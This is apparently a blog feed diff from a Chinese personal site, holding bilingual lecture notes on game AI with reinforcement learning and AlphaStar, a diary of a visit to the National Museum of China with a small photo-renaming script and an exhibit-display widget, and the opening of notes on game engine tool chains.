      • Environment information

        环境信息

      • Etc.

    • lmage

      图像

    webp

    DRL Example-Model the Game

    ​DRL 示例-游戏建模

    A DRL design process should contain:

    ​DRL 设计流程应包含:

    • State

      状态

    • Action

      动作

    • Reward

      奖励

    • NN design

      神经网络设计

    • Training Strategy

      训练策略

    webp

    DRL Example-State

    webp

    ​如上图这个游戏,状态 = 小地图 + 游戏统计 + 单位 + 玩家数据

    States (1/2)-Maps

    ​状态-地图

    Heights

    ​高度

    Visibility: fog of war

    ​可见性:战争迷雾

    Creep

    ​爬行

    Entity owners

    ​实体所有者

    Alerts

    ​警报

    Pathable

    ​可行进

    Buildable

    ​可建造

    webp

    States(2/2)-Units Information

    ​状态(2/2)-单位信息

    For each unit in a frame

    ​针对框架中的每个单位

    ​Unit type 单位类型

    ​OwnerStatus 所有者状态

    ​Display type 显示类型

    ​Position 位置

    ​Number of workers 工人数量

    ​Cool down 冷却

    ​Attributes 属性

    ​Unit attributes 单位属性

    ​Cargo status 货物状态

    ​Building status 建筑状态

    ​Resource status 资源状态

    ​Order status 订单状态

    ​Buff status 增益状态

    webp

    Actions

    ​动作

    For a unit it should have actions like

    ​对于一个单位来说,它应该有以下动作

    • What

      什么

      • move

        移动

      • attack

        攻击

      • build

        建造

    • Who

    • Where

      哪里

    • When next action

      何时进行下一步行动

    webp

    Rewards (1/2)

    ​奖励(1/2)

    Direct reward from game

    ​游戏直接奖励

    • Win: +1

      赢:+1

    • Lose: -1

      输:-1

    Pseudo-reward output along with critic network:

    ​与评论网络一起输出的伪奖励:

    • the distance of agent’s operation and human data statistic z

      代理操作与人类数据统计的距离 z

    webp

    Rewards (2/2)

    ​奖励 (2/2)

    Reward is much denser in OpenAl Five at Dota2

    ​Dota2 中 OpenAl Five 的奖励更加密集

    Different reward settings could help us to train different styles of agent

    ​不同的奖励设置可以帮助我们训练不同风格的代理

    • Aggressive

      激进

    • Conservative

      保守

    webp

    NN architectures

    webp

    ​OpenAI 提供的玩 Dota2 的神经网络架构。

    DRL example-Multi-Layer Perceptron (MLP)

    ​DRL 示例-多层感知器 (MLP)

    Classical and easy to implement

    ​经典且易于实现

    Flexible definition of the dimensions of inputs and outputs

    ​灵活定义输入和输出的维度

    webp

    Scalar feature example

    ​标量特征示例

    • Race

      种族

    • Owned Resource

      拥有的资源

    • Upgrade

      升级

    • Etc.

    DRL example-Convolutional Neural Network (CNN)

    ​DRL 示例-卷积神经网络(CNN)

    webp

    ​还介绍了 ResNet。

    DRL example-Transformer

    ​DRL 示例-Transformer

    • Introduce attention mechanisms

      引入注意力机制

    • Uncertain length vector

      不确定长度向量

    • Well represent the complex feature like multi agents

      很好地表示像多代理这样的复杂特征

    webp

    DRL example-Long-Short Term Memory (LSTM)

    ​DRL 示例 - 长短期记忆 (LSTM)

    Enable Al to remember or forget earlier data

    ​使 AI 能够记住或忘记早期数据

    webp

    DRL example-NN Architecture Selection

    ​DRL 示例-NN 架构选择

    NN Architecture selection for different type of feature

    ​不同类型特征的 NN 架构选择

    • Fixed length vector feature

      固定长度向量特征

      • Multi-Layer Perception

        多层感知

    • Uncertain length vector feature

      不确定长度向量特征

      • Long-Short Term Memory

        长短期记忆

      • Transformer

    • Image feature

      图像特征

      • ResNet
    • Raycast

    • Mesh

    webp

    Training Strategy-Supervised learning

    ​训练策略-监督学习

    AlphaStar is trained via both supervised learning and reinforcement learning. lt firstly learned a policy by supervised learning from human expert data

    ​AlphaStar 通过监督学习和强化学习进行训练。它首先通过监督学习从人类专家数据中学习策略

    z is a statistic summary of a strategy sampled from human data (for example,a build order)

    ​z 是从人类数据中采样的策略的统计摘要(例如,构建顺序)

    Minimize the distance (KL divergence) of agent policy and human decision distribution sampled from z

    ​最小化从 z 中采样的代理策略和人类决策分布的距离(KL 散度)

    webp

    Training Strategy-Reinforcement learning

    ​训练策略-强化学习

    Secondly, it took RL technique to improve the SL policy

    ​其次,采用强化学习技术改进 SL 策略

    TD(λ),V-trace, UPGO are specific Reinforcement learning methods to improve actor network and critic network.

    ​TD(λ)、V-trace、UPGO 是改进参与者网络和评论家网络的具体强化学习方法。

    The KL degree towards old SL policy would also be considered

    ​还会考虑对旧 SL 策略的 KL 度

    These tricks improved the policy and made it more human-like

    ​这些技巧改进了策略,使其更像人类

    webp

    Train the Agent-Self Play & Adversarial

    ​训练 Agent-自我游戏和对抗

    In AlphaStar three pools of agents attend training initialized from SL policy

    ​在 AlphaStar 中,三个 Agent 池参加从 SL 策略初始化的训练

    • Main agents [MA]

      主要 Agent [MA]

      • Goal: most robust and output

        目标:最稳健和输出

      • Self-play (35%)

        自我游戏 (35%)

      • Against past LE and ME agents (50%)

        对抗过去的 LE 和 ME Agent (50%)

      • Against past MA agents (15%)

        对抗过去的 MA Agent (15%)

    • League exploiters [LE]

      联盟利用者 [LE]

      • Goal: find weakness of past all agents (MA, LE, ME)

        目标:找到过去所有 Agent (MA、LE、ME) 的弱点

      • Against all past agents (MA, LE, ME)

        对抗所有过去的 Agent (MA、LE、ME)

    • Main exploiters [ME]

      主要利用者 [ME]

      • Goal: find weakness of current MA agent

        目标:找到当前 MA Agent 的弱点

      • Against current MA agent

        对抗当前的 MA Agent

    webp

    RL or SL?——SL analysis

    ​RL 还是 SL?——SL 分析

    Supervised Learning needs high quality data, and sometimes behaves well too

    ​监督学习需要高质量的数据,有时表现也很好

    • It behaves like human

      它表现得像人类

    • But may not outperform human expert data

      但可能不会胜过人类专家数据

    • Human data is unbalanced

      人类数据不平衡

    • Sometimes there is not enough data

      有时数据不足

    webp

    RL or SL?-RL analysis

    ​RL 还是 SL?-RL 分析

    Reinforcement Learning is usually considered as the optimal solution, however

    ​强化学习通常被认为是最佳解决方案,但是

    • Training a RL model is tough

      训练 RL 模型很困难

    • The model is hard to converge

      模型很难收敛

    • The game environment for training is also a huge development project

      训练的游戏环境也是一个巨大的开发项目

    • The data collection process could be slow

      数据收集过程可能很慢

    • And the behavior maybe unnatural

      行为可能不自然

    webp

    RL or SL?——Dense reward

    ​RL 还是 SL?——密集奖励

    What makes a good problem for RL

    ​什么才是 RL 的好问题

    webp

    RL or SL?——Summary

    Situation for SL
    SL 的情况
    Situation for RL
    强化学习的情况
    Easy to get data
    轻松获取数据
    Needs to outperform the master level
    需要超越大师水平
    Needs to perform like human
    需要像人类一样表现
    Enough budget
    足够的预算
    Data is unavailable
    数据不可用
    Dense reward
    密集奖励

    Hybrid

    ​混合

    Machine Learning is powerful.

    ​机器学习很强大。

    But it cost much too. For example, DeepMind spends 250million dollars to finish alpha star and a replication needs 13million dollars

    ​但成本也很高。例如,DeepMind 花费 2.5 亿美元完成 alpha star,而复制需要 1300 万美元

    We often need to make a tradeoff that place DNN on the human-like points (a part of thewhole combat).

    ​我们经常需要做出权衡,将 DNN 放在类人点上(整个战斗的一部分)。

    webp

    References

    HTN

    GOAP

    MCTS

    Machine Learning

    Machine Learning Game Applications

    ]]>
    @@ -1643,7 +1643,7 @@ /posts/Diary-%E5%8F%88%E4%BA%AC%E4%BA%86%EF%BC%88%E4%B8%80%EF%BC%89/ - 这是前言

    ​在北方想有点时间就去北京的各大博物馆开开眼界,第一站——中国国家博物馆!刚好 6.16 是个六级考完还不会有啥事的周末,17:00 提前订票,开冲🤩!


    ​Python 给手机拍摄的图片批量重命名:

    import os

    file_path = r"D:\XXX"
    file_name_list = []

    for file in os.listdir(file_path):
    file_name = file.split('_')[-1][:4] + '.jpg'
    count = 1
    while file_name in file_name_list:
    file_name = file.split('_')[-1][:4] + '_' + str(count) + '.jpg'
    count += 1
    file_name_list.append(file_name)
    os.rename(os.path.join(file_path, file), os.path.join(file_path, file_name))

    ​为了便于展示国博的各个“宝贝”,设计一个 Exhibit 类:

    .exhibits-container {
    display: flex;
    margin: 10px 0;
    padding: 10px 5px;
    }

    .exhibits-container.common {
    border: 2px solid var(--border);
    transition: border 0.5s ease-in-out;
    }

    .exhibits-container.rare {
    border: 2px solid #1e6eff;
    background: #1e6eff20;
    }

    .exhibits-container.epic {
    border: 2px solid #8250df;
    background: #8250df20;
    }

    .exhibits-container.legend {
    border: 2px solid #ff9800;
    background: #ff980020;
    }

    .exhibits-container.rare blockquote{
    border-left: 4px solid #1e6eff;
    background: #1e6eff20;
    }

    .exhibits-container.epic blockquote{
    border-left: 4px solid #8250df;
    background: #8250df20;
    }

    .exhibits-container.legend blockquote{
    border-left: 4px solid #ff9800;
    background: #ff980020;
    }

    .reverse {
    flex-direction: row-reverse;
    }

    .exhibits-img-container img {
    max-width: 80%;
    box-shadow: 4px 4px 5px rgba(0, 0, 0, 0.5);
    margin: 0 auto;
    }

    .exhibits-img-container .hidden {
    display: none;
    }

    .exhibits-container-left {
    max-width: 50%;
    justify-content: center;
    }

    .exhibits-container-right {
    width: 100%;
    margin: 0 5px;
    }

    .exhibits-container-right .title {
    margin: 5px auto;
    font-weight: bold;
    font-size: 18px;
    }

    .exhibits-container-right .desc {
    margin: 0 auto;
    padding: 0 10px;
    }

    .exhibits-container-left,
    .exhibits-container-right {
    display: flex;
    flex-direction: column;
    justify-content: center;
    }

    .f-carousel__dots>li:before{
    display: none;
    }

    span.f-carousel__dot {
    color: var(--text-primary);
    transition: color 0.5s ease-in-out;
    }

    .f-button.is-prev {
    transform: translateY(-50%) translateX(-12px) !important;
    }

    .f-button.is-next {
    transform: translateY(-50%) translateX(12px) !important;
    }

    .f-carousel__dots {
    transform: translateY(8px);
    }

    .f-carousel__slide {
    display: flex;
    align-items: center;
    }

    @media screen and (max-width: 660px) {
    .exhibits-container {
    flex-direction: column !important;
    }

    .exhibits-container-left {
    max-width: 100%;
    margin: 0;
    }

    .exhibits-container-right {
    width: auto;
    margin: 10px 5px 5px;
    }

    }
    var exhibitsCount = 0;

    class Exhibits {
    constructor(ravity, img, title, desc="", quote="") {
    this.exhibitsContainer = $('<div>').addClass('exhibits-container').addClass(ravity);
    exhibitsCount += 1;
    if (exhibitsCount % 2 == 0) {
    this.exhibitsContainer.addClass('reverse');
    }
    const exhibitsContainerLeft = $('<div>').addClass('exhibits-container-left');
    const exhibitsImgContainer = $('<div>').addClass('exhibits-img-container');

    if (img.length == 1) {
    exhibitsImgContainer.append($('<img>').attr('no-figcaption', '').attr('src', '/images/loading.webp').attr('data-original', img[0][0]).attr('alt', img[0][1]));
    }
    else {
    const fCarousel = $('<div>').addClass('f-carousel');
    const fCarouselViewport = $('<div>').addClass('f-carousel__viewport');
    fCarousel.append(fCarouselViewport);
    const fCarouselTrack = $('<div>').addClass('f-carousel__track');
    fCarouselViewport.append(fCarouselTrack);

    for (const item of img) {
    let fCarouselSlide = $('<div>').addClass('f-carousel__slide');
    fCarouselSlide.append($('<img>').attr('no-figcaption', '').attr('src', '/images/loading.webp').attr('src', item[0]).attr('alt', item[1]));
    fCarouselTrack.append(fCarouselSlide);
    }
    exhibitsImgContainer.append(fCarousel);
    new Carousel(fCarousel.get(0), {});
    }

    exhibitsContainerLeft.append(exhibitsImgContainer);
    const exhibitsContainerRight = $('<div>').addClass('exhibits-container-right');
    const titlePara = $('<p>').addClass('title').text(title);

    exhibitsContainerRight.append(titlePara);

    if (desc.length > 0) {
    const descPara = $('<p>').addClass('desc').text(desc);
    exhibitsContainerRight.append(descPara);
    }

    if(quote.length > 0) {
    const quotePara = $('<blockquote>').append($('<p>').text(quote));
    exhibitsContainerRight.append(quotePara);
    }

    this.exhibitsContainer.append(exhibitsContainerLeft).append(exhibitsContainerRight);
    }

    render() {
    $(document.currentScript).before(this.exhibitsContainer);
    }
    }

    ​使用方法示例(用到了轮播插件 Carousel | Fancyapps UI - Robust JavaScript UI Component Library,必须提前引入):

    <script>
    new Exhibits('common', [
    ['国博/1-远古时期/0904_2.webp', '野兽残骸'],
    ['国博/1-远古时期/0904_3.webp', '野兽残骸'],
    ['国博/1-远古时期/0904_4.webp', '野兽残骸'],
    ], '野兽残骸',
    '​祖先们与野兽相伴。',
    ).render();
    </script>

    ​参考《炉石传说》的稀有度,依据“宝贝”的名气及其做工的精湛程度,按主观臆断给这些“宝贝”分为“普通”、“稀有”、“史诗”和“传说”四个等级😍!如有异议,算我没文化。


    ​国博里的“宝贝”太多了,短时间内不能把这些东西都讲清楚。这个系列应该会不断维护并完善其内容。

    这是正文

    我出发了

    05:56 每日任务

    每日任务

    ​夏天到了,醒得越来越早了……

    ​大早上 5 点 40 左右起床下楼,宿管阿姨居然已经提前把宿舍门开了。吃喝拉撒完,考虑到中午在国博进餐不便,去食堂提前把肉夹馍买好了。肉夹馍阿姨跟我说这是见到我的第 4 个学期了,居然才知道我是个研究生😇。

    ​再去实验室门口完成一下每日任务,然后乘公交去保定东站!

    06:48 保定东站

    本学期第二次拜访

    ​之前怕起不来赶不上早发的车,买的 G6716,08:19 保定东 - 08:50 北京西,¥63。事实证明是可以在宿管阿姨开门后,在 7 点以前赶到高铁站的。于是改签 G6720,07:03 保定东 - 07:24 高碑店东 - 07:53 北京西,¥57。这样就可以赶在开门前到国博了,除去退票费还退了 4 块钱😍!

    06:59 逆向高铁

    看来走的跟上次不是一个道

    ​这次上车方向居然跟上次进京方向相反……

    07:17 燕南赵北

    高碑店东

    ​高碑店东站广场上的四个大字。啊,河北!大河之北,燕南赵北。乱世兵家必争之地,盛世一大冤种😭。

    07:42 永定河旁

    老北京园博园

    ​西边进京。永定河旁出现了北京园博园里的各色奇异建筑。

    07:49 北京电塔

    老北京电视塔

    ​这个电视塔长得跟天津的几乎一模一样,但是比天津的矮一些。

    07:50 北京西站

    老北京雾蒙蒙

    ​北京西站上面还有个老北京特色建筑。

    ​恭喜!今天早上有北京特产可爱小雾霾!

    探索国博

    08:27 开始排队

    老北京排长队

    ​下车。乘坐地铁 9 号线北京西站-军事博物馆-地铁 1 号线天安门东,¥4。

    ​9 点开门的国博于 8 点半就已经排起了长队。

    这么多人?
    这就是北京!

    老北京天安门

    ​看到天安门了,来跟之前一直很想去看天安门的爱国凡哥问个好!

    😭凡哥
    给你看天安门
    真快啊

    侧面看国博

    ​排队过程中来一张侧面的国博。

    09:00 成功入场

    国博导航

    ​经过一次近乎机场安检级别的安检,终于进场了!

    ​看一看国博的导航,先冲 B1 楼《古代中国基本陈列》感受一下中华优秀传统文化🥳!

    09:01 古代中国

    五千年华夏

    ​来国博前还把初中历史书翻看了一遍。

    09:03 远古时期

    ——约两百万年前至约公元前二十一世纪

    ​远古时期分为旧石器时代和新石器时代两个阶段。旧石器时代人类使用打制石器、木棒等工具,从事采集、狩猎活动,完成了从直立人、早期智人到晚期智人的进化过程。新石器时代人们使用磨制石器,制作陶器,发明了农业和养畜业,形成了各具特色的地域文化。新石器时代晚期,社会逐步分化,出现了权贵阶层及相应的礼仪制度,在聚落分化的过程中涌现出众多城堡,社会开始向早期国家过渡。

    09:14 夏商西周

    ——约公元前二十一世纪至公元前七七一年

    ​夏、商、西周时期是中国古代早期国家形态的形成与初步发展阶段。这一时期,王权政治得以强化,并不断完善。青铜铸造达到鼎盛,辉煌灿烂。丰富的汉字材料,记录了当时政治、经济与文化面貌。西周统治者推行的礼制,重在彰显、维护等级秩序,对此后中国古代社会的发展产生了深远影响。

    ​我觉得这个时期的中国文明已经发展到了一个比较高的水平,青铜器的精湛程度要比后面很多时期的都要好很多。

    09:35 春秋战国

    ——公元前七七零年至公元前二二一年

    ​春秋战国时期,西周以来的礼制分崩离析,社会结构发生根本性变化;铁器的广泛使用促进了生产力和社会经济的发展;学术思想百花齐放。民族间相互融合,华夏民族主体形成,整个社会在征战兼并中逐步走向统一。

    风卷狂沙,兵临城下。
    气贯长虹,金戈铁马。
    韶华易逝,落尽多少残花,
    且问苍生,谁能一统天下。
    血染万里黄沙,今朝谁家天下?
    醉看几度落霞,泪洒谁家铠甲。
    王于兴师,厉兵秣马。
    与子偕行,修我兵甲。
    啊~与子同仇,啊~且为谁家?
    弑君谋国,图雄争霸。
    万姓流离,望断天涯。
    啊~兆黎皆苦,啊~何处为家?

    ​啊~兆黎皆苦!燕赵儿女,慷慨悲歌。河北保定遭老罪咯😭。这个时候福州还没有建城。

    09:46 秦汉时代

    ——公元前二二一年至公元二二零年

    ​秦汉时期,长期以来诸侯割据纷争的局面结束,专制主义中央集权制在全国范围内建立,中国历史进入大一统时代。新工艺技术的发明和应用,加速了社会经济的发展,丰富了人们的生活,中外文化交流也空前繁荣。我们的祖先在秦汉时期以其卓越的创造力,建树了中国古代文明发展史上的无数丰碑。

    六王毕,四海一。
    蜀山兀,阿房出。

    ​你政哥统一了天下!大肆改革!步子迈大扯到蛋了!很快就倒台了!接着汉朝继承并弘扬了君主专制制度!

    大风起兮云飞扬,
    威加海内兮归故乡,
    安得猛士兮守四方。
    ]]>
    + 这是前言

    ​在北方想有点时间就去北京的各大博物馆开开眼界,第一站——中国国家博物馆!刚好 6.16 是个六级考完还不会有啥事的周末,17:00 提前订票,开冲🤩!


    ​Python 给手机拍摄的图片批量重命名:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    import os

    file_path = r"D:\XXX"
    file_name_list = []

    for file in os.listdir(file_path):
    file_name = file.split('_')[-1][:4] + '.jpg'
    count = 1
    while file_name in file_name_list:
    file_name = file.split('_')[-1][:4] + '_' + str(count) + '.jpg'
    count += 1
    file_name_list.append(file_name)
    os.rename(os.path.join(file_path, file), os.path.join(file_path, file_name))

    ​为了便于展示国博的各个“宝贝”,设计一个 Exhibit 类:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    80
    81
    82
    83
    84
    85
    86
    87
    88
    89
    90
    91
    92
    93
    94
    95
    96
    97
    98
    99
    100
    101
    102
    103
    104
    105
    106
    107
    108
    109
    110
    111
    112
    113
    114
    115
    116
    117
    118
    119
    120
    121
    122
    123
    124
    125
    .exhibits-container {
    display: flex;
    margin: 10px 0;
    padding: 10px 5px;
    }

    .exhibits-container.common {
    border: 2px solid var(--border);
    transition: border 0.5s ease-in-out;
    }

    .exhibits-container.rare {
    border: 2px solid #1e6eff;
    background: #1e6eff20;
    }

    .exhibits-container.epic {
    border: 2px solid #8250df;
    background: #8250df20;
    }

    .exhibits-container.legend {
    border: 2px solid #ff9800;
    background: #ff980020;
    }

    .exhibits-container.rare blockquote{
    border-left: 4px solid #1e6eff;
    background: #1e6eff20;
    }

    .exhibits-container.epic blockquote{
    border-left: 4px solid #8250df;
    background: #8250df20;
    }

    .exhibits-container.legend blockquote{
    border-left: 4px solid #ff9800;
    background: #ff980020;
    }

    .reverse {
    flex-direction: row-reverse;
    }

    .exhibits-img-container img {
    max-width: 80%;
    box-shadow: 4px 4px 5px rgba(0, 0, 0, 0.5);
    margin: 0 auto;
    }

    .exhibits-img-container .hidden {
    display: none;
    }

    .exhibits-container-left {
    max-width: 50%;
    justify-content: center;
    }

    .exhibits-container-right {
    width: 100%;
    margin: 0 5px;
    }

    .exhibits-container-right .title {
    margin: 5px auto;
    font-weight: bold;
    font-size: 18px;
    }

    .exhibits-container-right .desc {
    margin: 0 auto;
    padding: 0 10px;
    }

    .exhibits-container-left,
    .exhibits-container-right {
    display: flex;
    flex-direction: column;
    justify-content: center;
    }

    .f-carousel__dots>li:before{
    display: none;
    }

    span.f-carousel__dot {
    color: var(--text-primary);
    transition: color 0.5s ease-in-out;
    }

    .f-button.is-prev {
    transform: translateY(-50%) translateX(-12px) !important;
    }

    .f-button.is-next {
    transform: translateY(-50%) translateX(12px) !important;
    }

    .f-carousel__dots {
    transform: translateY(8px);
    }

    .f-carousel__slide {
    display: flex;
    align-items: center;
    }

    @media screen and (max-width: 660px) {
    .exhibits-container {
    flex-direction: column !important;
    }

    .exhibits-container-left {
    max-width: 100%;
    margin: 0;
    }

    .exhibits-container-right {
    width: auto;
    margin: 10px 5px 5px;
    }

    }
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    var exhibitsCount = 0;

    class Exhibits {
    constructor(ravity, img, title, desc="", quote="") {
    this.exhibitsContainer = $('<div>').addClass('exhibits-container').addClass(ravity);
    exhibitsCount += 1;
    if (exhibitsCount % 2 == 0) {
    this.exhibitsContainer.addClass('reverse');
    }
    const exhibitsContainerLeft = $('<div>').addClass('exhibits-container-left');
    const exhibitsImgContainer = $('<div>').addClass('exhibits-img-container');

    if (img.length == 1) {
    exhibitsImgContainer.append($('<img>').attr('no-figcaption', '').attr('src', '/images/loading.webp').attr('data-original', img[0][0]).attr('alt', img[0][1]));
    }
    else {
    const fCarousel = $('<div>').addClass('f-carousel');
    const fCarouselViewport = $('<div>').addClass('f-carousel__viewport');
    fCarousel.append(fCarouselViewport);
    const fCarouselTrack = $('<div>').addClass('f-carousel__track');
    fCarouselViewport.append(fCarouselTrack);

    for (const item of img) {
    let fCarouselSlide = $('<div>').addClass('f-carousel__slide');
    fCarouselSlide.append($('<img>').attr('no-figcaption', '').attr('src', '/images/loading.webp').attr('src', item[0]).attr('alt', item[1]));
    fCarouselTrack.append(fCarouselSlide);
    }
    exhibitsImgContainer.append(fCarousel);
    new Carousel(fCarousel.get(0), {});
    }

    exhibitsContainerLeft.append(exhibitsImgContainer);
    const exhibitsContainerRight = $('<div>').addClass('exhibits-container-right');
    const titlePara = $('<p>').addClass('title').text(title);

    exhibitsContainerRight.append(titlePara);

    if (desc.length > 0) {
    const descPara = $('<p>').addClass('desc').text(desc);
    exhibitsContainerRight.append(descPara);
    }

    if(quote.length > 0) {
    const quotePara = $('<blockquote>').append($('<p>').text(quote));
    exhibitsContainerRight.append(quotePara);
    }

    this.exhibitsContainer.append(exhibitsContainerLeft).append(exhibitsContainerRight);
    }

    render() {
    $(document.currentScript).before(this.exhibitsContainer);
    }
    }

    ​使用方法示例(用到了轮播插件 Carousel | Fancyapps UI - Robust JavaScript UI Component Library,必须提前引入):

    1
    2
    3
    4
    5
    6
    7
    8
    9
    <script>
    new Exhibits('common', [
    ['国博/1-远古时期/0904_2.webp', '野兽残骸'],
    ['国博/1-远古时期/0904_3.webp', '野兽残骸'],
    ['国博/1-远古时期/0904_4.webp', '野兽残骸'],
    ], '野兽残骸',
    '​祖先们与野兽相伴。',
    ).render();
    </script>

    ​参考《炉石传说》的稀有度,依据“宝贝”的名气及其做工的精湛程度,按主观臆断给这些“宝贝”分为“普通”、“稀有”、“史诗”和“传说”四个等级😍!如有异议,算我没文化。


    ​国博里的“宝贝”太多了,短时间内不能把这些东西都讲清楚。这个系列应该会不断维护并完善其内容。

    这是正文

    我出发了

    05:56 每日任务

    每日任务

    ​夏天到了,醒得越来越早了……

    ​大早上 5 点 40 左右起床下楼,宿管阿姨居然已经提前把宿舍门开了。吃喝拉撒完,考虑到中午在国博进餐不便,去食堂提前把肉夹馍买好了。肉夹馍阿姨跟我说这是见到我的第 4 个学期了,居然才知道我是个研究生😇。

    ​再去实验室门口完成一下每日任务,然后乘公交去保定东站!

    06:48 保定东站

    本学期第二次拜访

    ​之前怕起不来赶不上早发的车,买的 G6716,08:19 保定东 - 08:50 北京西,¥63。事实证明是可以在宿管阿姨开门后,在 7 点以前赶到高铁站的。于是改签 G6720,07:03 保定东 - 07:24 高碑店东 - 07:53 北京西,¥57。这样就可以赶在开门前到国博了,除去退票费还退了 4 块钱😍!

    06:59 逆向高铁

    看来走的跟上次不是一个道

    ​这次上车方向居然跟上次进京方向相反……

    07:17 燕南赵北

    高碑店东

    ​高碑店东站广场上的四个大字。啊,河北!大河之北,燕南赵北。乱世兵家必争之地,盛世一大冤种😭。

    07:42 永定河旁

    老北京园博园

    ​西边进京。永定河旁出现了北京园博园里的各色奇异建筑。

    07:49 北京电塔

    老北京电视塔

    ​这个电视塔长得跟天津的几乎一模一样,但是比天津的矮一些。

    07:50 北京西站

    老北京雾蒙蒙

    ​北京西站上面还有个老北京特色建筑。

    ​恭喜!今天早上有北京特产可爱小雾霾!

    探索国博

    08:27 开始排队

    老北京排长队

    ​下车。乘坐地铁 9 号线北京西站-军事博物馆-地铁 1 号线天安门东,¥4。

    ​9 点开门的国博于 8 点半就已经排起了长队。

    这么多人?
    这就是北京!

    老北京天安门

    ​看到天安门了,来跟之前一直很想去看天安门的爱国凡哥问个好!

    😭凡哥
    给你看天安门
    真快啊

    侧面看国博

    ​排队过程中来一张侧面的国博。

    09:00 成功入场

    国博导航

    ​经过一次近乎机场安检级别的安检,终于进场了!

    ​看一看国博的导航,先冲 B1 楼《古代中国基本陈列》感受一下中华优秀传统文化🥳!

    09:01 古代中国

    五千年华夏

    ​来国博前还把初中历史书翻看了一遍。

    09:03 远古时期

    ——约两百万年前至约公元前二十一世纪

    ​远古时期分为旧石器时代和新石器时代两个阶段。旧石器时代人类使用打制石器、木棒等工具,从事采集、狩猎活动,完成了从直立人、早期智人到晚期智人的进化过程。新石器时代人们使用磨制石器,制作陶器,发明了农业和养畜业,形成了各具特色的地域文化。新石器时代晚期,社会逐步分化,出现了权贵阶层及相应的礼仪制度,在聚落分化的过程中涌现出众多城堡,社会开始向早期国家过渡。

    09:14 夏商西周

    ——约公元前二十一世纪至公元前七七一年

    ​夏、商、西周时期是中国古代早期国家形态的形成与初步发展阶段。这一时期,王权政治得以强化,并不断完善。青铜铸造达到鼎盛,辉煌灿烂。丰富的汉字材料,记录了当时政治、经济与文化面貌。西周统治者推行的礼制,重在彰显、维护等级秩序,对此后中国古代社会的发展产生了深远影响。

    ​我觉得这个时期的中国文明已经发展到了一个比较高的水平,青铜器的精湛程度要比后面很多时期的都要好很多。

    09:35 春秋战国

    ——公元前七七零年至公元前二二一年

    ​春秋战国时期,西周以来的礼制分崩离析,社会结构发生根本性变化;铁器的广泛使用促进了生产力和社会经济的发展;学术思想百花齐放。民族间相互融合,华夏民族主体形成,整个社会在征战兼并中逐步走向统一。

    风卷狂沙,兵临城下。
    气贯长虹,金戈铁马。
    韶华易逝,落尽多少残花,
    且问苍生,谁能一统天下。
    血染万里黄沙,今朝谁家天下?
    醉看几度落霞,泪洒谁家铠甲。
    王于兴师,厉兵秣马。
    与子偕行,修我兵甲。
    啊~与子同仇,啊~且为谁家?
    弑君谋国,图雄争霸。
    万姓流离,望断天涯。
    啊~兆黎皆苦,啊~何处为家?

    ​啊~兆黎皆苦!燕赵儿女,慷慨悲歌。河北保定遭老罪咯😭。这个时候福州还没有建城。

    09:46 秦汉时代

    ——公元前二二一年至公元二二零年

    ​秦汉时期,长期以来诸侯割据纷争的局面结束,专制主义中央集权制在全国范围内建立,中国历史进入大一统时代。新工艺技术的发明和应用,加速了社会经济的发展,丰富了人们的生活,中外文化交流也空前繁荣。我们的祖先在秦汉时期以其卓越的创造力,建树了中国古代文明发展史上的无数丰碑。

    六王毕,四海一。
    蜀山兀,阿房出。

    ​你政哥统一了天下!大肆改革!步子迈大扯到蛋了!很快就倒台了!接着汉朝继承并弘扬了君主专制制度!

    大风起兮云飞扬,
    威加海内兮归故乡,
    安得猛士兮守四方。
    ]]>
    @@ -1701,7 +1701,7 @@ /posts/GAMES104-Tool%20Chains/ - 资源

    课程

    第十三节:引擎工具链基础

    Outline of Tool Chains

    Foundation of Tool Chains

    • What is Game Engine Tool Chains

      什么是游戏引擎工具链

    • Complicated Tool GUI

      复杂的工具 GUI

    • How to Load Asset -Deserialization

      如何加载资产-反序列化

    • How to Make a Robust Tools

      如何制作强大的工具

    • How to Make Tool Chain

      如何制作工具链

    • What You See is What You Get

      所见即所得

    • One More Thing - Plugin

      还有一件事 - 插件

    Applications & Advanced Topic

    • Common Game Production Workflow

      常见的游戏制作工作流程

    • Common Editors

      常见的编辑

    • Reflection

      反射

    • Collaborative Editing

      协作编辑

    What is Game Engine Tool Chain

    ​什么是游戏引擎工具链?

    Layer Between Users and Engine Runtime

    ​用户和引擎运行时之间的层。让用户更好地操作游戏引擎写游戏。

    webp

    Bridge Between DCC Tools and Game Engine

    ​DCC 工具和游戏引擎之间的桥梁

    webp

    ​让游戏引擎能够读取用户使用各种工具创造的艺术资源。

    Let Huge Different Mindset Users Work Together

    ​让不同心态的用户共同合作

    webp

    For Designers

    对于设计师

    • lterate the gameplay quickly

      快速迭代游戏玩法

    • Implement game logic prototype quickly even without programming

      无需编程即可快速实现游戏逻辑原型

    • Edit massive data easily

      轻松编辑海量数据

    For Artists

    对于艺术家

    • The quality of the result

      结果质量

    • Convenient workflow

      便捷的工作流程

    • What you see is what you get (WYSIWYG)

      所见即所得 (WYSIWYG)

    Complicated Tool GUI

    ​复杂的工具 GUI

    Graphics User interface (GUI)

    ​图形用户界面 (GUl)

    webp

    GUl is getting more and more complex

    ​GUI 越来越复杂

    • Fast iteration

      快速迭代

    • Separation of design and implementation

      设计和实现分离

    • Reusability

      可重用性

    Immediate Mode

    webp

    • The client calls cause rendering of graphics objects to the display.

      客户端调用导致图形对象渲染到显示器。

    • the data to describe rendering primitives is inserted frame by frame directly from the client into a command list.

      描述渲染图元的数据直接从客户端逐帧插入到命令列表中

    Imgui::DrawButton("hello", 12, 24, &callback_func);

    webp

    Characteristic

    ​特点

    • Lightweight

      轻量级

    • Procedural programming

      程序化编程

    • Widgets don’t maintain any data or state

      小部件不维护任何数据或状态

    Pros

    ​优点

    • Straightforward

      直接

    • Simple

      简单

    • Quick prototype

      快速原型

    Cons

